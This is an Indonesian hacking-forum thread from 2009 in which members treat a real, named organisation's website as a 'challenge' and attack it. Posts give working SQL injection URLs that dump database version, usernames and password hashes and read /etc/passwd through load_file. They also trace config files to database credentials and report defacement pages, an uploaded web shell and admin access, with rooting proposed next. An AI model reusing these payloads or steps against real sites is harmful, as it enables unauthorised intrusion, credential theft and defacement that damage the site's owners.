gblack's Challenge Level 1 - Hax This Site!

Post by **gblack** » Tue Dec 15, 2009 7:32 pm

@bom2
Yah bagos lah klo smua orang Indonesia berpikir kek elu! Di sini tuh tempat orang buad belajar, bukan nyari duid... Gw pun di sini karena masih pengen belajar! Klo elu mw nyari duid mendingan jgn di sini & ga usah ikut campur ama orang2 yang lagi belajar! Ngotor2in thread aza...!!

@poni
Sabar cuy... Banyak banget yg penasaran neh... Heuheuheuheu...

blackant · Post by **blackant** » Tue Dec 15, 2009 10:56 pm

ikutan nunggu ah....jadi peanasaran jg :ngakak:

Post by **3xtr3m3b0y** » Wed Dec 16, 2009 2:45 am

adwisatya wrote:Cuma mau menambah dikit, walau belum sampe nanam backdoor.

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,user(),database(),6,7,8,9,10--

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,user(),database(),6,7,8,9,10+from+phpbb_users--

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,version(),3,group_concat(username,0x3a,password),database(),6,7,8,9,10+from+login--

Code: Select all

http://ioseaturtles.org/webadmin/login.php

Lanjutin dikit walau gak ada artinya :

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10--

Post by **3xtr3m3b0y** » Wed Dec 16, 2009 3:07 am

Lanjutin yg di atas sekalian, sapa tau aja ada hubungannya :

Code: Select all

[b]Info penting pada /etc/passwd:[/b]
turtlefa:x:107:1::/web/./ioseaturtles:/bin/true

[b]Webdir:[/b]
/web/./ioseaturtles

[b]Nyari file yg mgkn ada:[/b]
/web/./ioseaturtles/index.php

[b]View Source, dpt baris ini:[/b]
/* Include Files *********************/
session_start(); 
include_once("_include/function.php");
include_once("_include/class.mysql.php");
/*************************************/

[b]Lanjut, ke file berikutnya:[/b]
/web/./ioseaturtles/_include/class.mysql.php

[b]View Source lagi, dpt baris ini :[/b]
define("EZSQL_DB_USER", "turtlepma");
define("EZSQL_DB_PASSWORD", "xxxxxxxx");  << Sensor Dikit Ahh...!!!
define("EZSQL_DB_NAME", "turtle");
define("EZSQL_DB_HOST", "localhost");

[b]Nyari halaman phpmyadmin, dapatx ini:[/b]
http://ioseaturtles.org/phpmyadmin/

Wew tapi bingung selanjutnya mo diapain lagi yakss...??? :circle:

Post by **gblack** » Wed Dec 16, 2009 3:45 am

@3xtr3m3b0y
Congratz! You got the clue bro... :love:
2 more steps... :kaca:

Post by **3xtr3m3b0y** » Wed Dec 16, 2009 4:36 am

gblack wrote:@3xtr3m3b0y
Congratz! You got the clue bro... :love:
2 more steps... :kaca:

Wah masa sech Omz... :kaca:
Klo gtu numpang nyoret dikit ahh...!!! :usap:

http://ioseaturtles.org/UserFiles/File/ ... 3m3b0y.txt

Maap cmn bisa itu doank...!!! :usap:

Post by **gblack** » Wed Dec 16, 2009 4:44 am

Akhirnyah... :malumalu:
Huehuehuehuehue...

@3xtr3m3b0y
+1 :love:

Congratz bro! Talk less do more!! Dont be like bom2... :ngakak:

Post by **Bi4kKob4r** » Wed Dec 16, 2009 6:56 am

hoaaaammmm... baru bangun...
sory om gblack... tadi malam ga bisa jawab udah ketiduran :mati: :mati: :mati:

om, nitip defacer ya :devil :devil :devil
http://ioseaturtles.org/UserFiles/.../.b10.html

oh ya om, nih gimana sih caranya? om gblack hebat ya :omg: :omg: :omg:

nitip 1 ya... ^_^ lagi pengen nyamain tempat ma om gblack

http://ioseaturtles.org/UserFiles/.../.bi4kkob4r.txt

terus ini om, ga sengaja ke pencet print screen

Ga sengaja bisa masuk admin om :maaf: :maaf: :maaf:

keep going deh

tapa lagi ya om :kaca: :kaca:

hummm..hummm :tapa: :tapa: :tapa:

Post by **3xtr3m3b0y** » Wed Dec 16, 2009 9:13 am

Wew...cmn bisa Leng..geleng..6x sama master2 di atas :malumalu:
Ayuuk dilanjut ke :
Level 2 : Ngupload or Create File PHP (Text Only not Backdoor)
Level 3 : Ngeroot (Create a file in /etc dir as a proof)

Dinantikan info selanjutnya...!!!
Turu maneh...!!! :tidur:

Post by **Bi4kKob4r** » Wed Dec 16, 2009 9:20 am

:malumalu: :malumalu: :malumalu:

nih punya om gblack nih... http://ioseaturtles.org/UserFiles/image ... kshell.php

ha..ha... cari dong punya Bi4kKob4r dimana :devil :devil :devil

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!

Re: gblack's Challenge Level 1 - Hax This Site!